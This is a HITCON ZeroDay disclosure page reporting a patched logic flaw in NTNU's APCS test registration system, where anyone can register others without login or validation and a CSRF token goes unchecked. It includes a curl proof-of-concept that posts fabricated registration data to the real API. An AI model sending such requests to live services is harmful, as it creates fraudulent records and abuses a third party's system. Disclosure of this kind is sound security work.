師大 APCS 檢測系統任意註冊 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2018-01320
  •  發信 Vendor: 國立臺灣師範大學
  • Title: 師大 APCS 檢測系統任意註冊
  • Introduction: 免登入即可替他人註冊,亦不會驗證電子信箱、身分證字號等正確性

處理狀態

目前狀態

公開
Last Update : 2018/10/23
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 未複測
  • 公開

處理歷程

  • 2018/09/10 23:16:46 : 新提交 (由 Sean Wei 更新此狀態)
  • 2018/09/10 23:23:48 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/09/11 23:34:02 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/09/11 23:34:02 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/09/11 23:34:02 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/10/11 15:44:34 : 複測申請中 (由 組織帳號 更新此狀態)
  • 2018/10/13 09:35:50 : 未修補完成 (由 Sean Wei 更新此狀態)
  • 2018/10/15 08:52:34 : 已修補 (由 組織帳號 更新此狀態)
  • 2018/10/23 03:00:10 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2018-01320
  • 通報者:Sean64 (Sean Wei)
  • 風險:低
  • 類型:邏輯漏洞 (Logic Flaws)

參考資料

攻擊者可經由該漏洞繞過網站邏輯行為進行惡意攻擊。

漏洞說明: OWASP - Testing for business logic
https://www.owasp.org/index.php/Testing_for_business_logic

漏洞說明: CWE-840: Business Logic Errors
https://cwe.mitre.org/data/definitions/840.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

curl -q "https://api.apcs.csie.ntnu.edu.tw/apcs/insertRegisterData" \
-d "id=47" \
-d "testList=10703" \
-d "name=%E9%9F%8B%E8%A9%A0%E7%A5%A5" \
-d "email=apcs-test%40sean.taipei" \
-d "authnumber=Y999999999" \
-d "cellphone=55688" \
-d "grade=%E9%AB%98%E4%B8%89" \
-d "school=%E6%96%B0%E5%8C%97%E5%B8%82%E5%B8%82%E7%AB%8B%E6%B8%85%E6%B0%B4%E9%AB%98%E4%B8%AD" \
-d "region=%E8%87%BA%E5%8C%97%E5%B8%82" \
-d "subregion=%E5%9C%8B%E7%AB%8B%E8%87%BA%E7%81%A3%E5%B8%AB%E7%AF%84%E5%A4%A7%E5%AD%B8_%E5%85%AC%E9%A4%A8" \
-d "region2=%E8%87%BA%E5%8C%97%E5%B8%82" \
-d "subregion2=%E5%9C%8B%E7%AB%8B%E8%87%BA%E5%8C%97%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%B8" \
-d "is_disabled=0"

敘述

於先前頁面已提供 CSRF Token ,但未做驗證

使用上述 curl 指令即可確認此漏洞存在
圖片

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;